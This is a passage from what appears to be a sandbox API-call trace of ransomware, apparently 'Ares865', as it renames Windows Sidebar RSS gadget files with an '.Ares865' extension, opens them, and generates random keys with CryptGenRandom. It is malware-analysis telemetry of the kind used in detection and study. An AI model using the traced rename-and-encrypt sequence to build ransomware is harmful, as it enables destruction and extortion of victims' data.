wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png.Ares865") returned 89 [0117.609] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png.ares865"), dwFlags=0x1) returned 1 [0117.611] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.611] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3242) returned 1 [0117.611] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.612] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.612] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.615] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.615] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.615] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png.Ares865") returned 100 [0117.616] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png.ares865"), dwFlags=0x1) returned 1 [0117.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.617] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5980) returned 1 [0117.617] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.618] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.618] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.622] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.622] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png.Ares865") returned 102 [0117.622] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png.ares865"), dwFlags=0x1) returned 1 [0117.624] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8942) returned 1 [0117.625] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.625] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.625] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.629] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.629] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.629] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.630] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif.Ares865") returned 89 [0117.630] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rsslogo.gif"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rsslogo.gif.ares865"), dwFlags=0x1) returned 1 [0117.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssLogo.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rsslogo.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1696) returned 1 [0117.632] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.632] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.632] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.635] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.636] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.636] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.636] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png.Ares865") returned 106 [0117.636] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png.ares865"), dwFlags=0x1) returned 1 [0117.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.641] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2957) returned 1 [0117.642] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.642] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.642] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.645] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.646] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.646] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png.Ares865") returned 108 [0117.647] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png.ares865"), dwFlags=0x1) returned 1 [0117.648] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2999) returned 1 [0117.648] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.649] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.649] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.652] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.653] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.653] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.653] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png.Ares865") returned 106 [0117.653] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png.ares865"), dwFlags=0x1) returned 1 [0117.655] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1266) returned 1 [0117.655] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.656] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.656] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.715] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.729] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.730] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.738] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" [0117.745] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.Ares865") returned 88 [0117.745] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html.ares865"), dwFlags=0x1) returned 1 [0117.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2154) returned 1 [0117.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.750] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.750] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.755] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.755] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.755] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.Ares865") returned 90 [0117.756] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html.ares865"), dwFlags=0x1) returned 1 [0117.757] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.758] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10012) returned 1 [0117.758] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.759] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.759] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.772] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.784] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.784] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.Ares865") returned 90 [0117.785] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html.ares865"), dwFlags=0x1) returned 1 [0117.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3326) returned 1 [0117.787] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.788] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.788] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.790] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.791] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.791] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.792] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js" [0117.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.Ares865") returned 91 [0117.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js.ares865"), dwFlags=0x1) returned 1 [0117.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=110308) returned 1 [0117.795] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.795] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.795] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.844] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.852] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.852] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js.Ares865") returned 91 [0117.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\settings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\settings.js.ares865"), dwFlags=0x1) returned 1 [0117.856] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\settings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5542) returned 1 [0117.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.857] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.857] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.864] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.873] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.873] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.876] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" [0117.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.Ares865") returned 91 [0117.877] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css.ares865"), dwFlags=0x1) returned 1 [0117.879] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 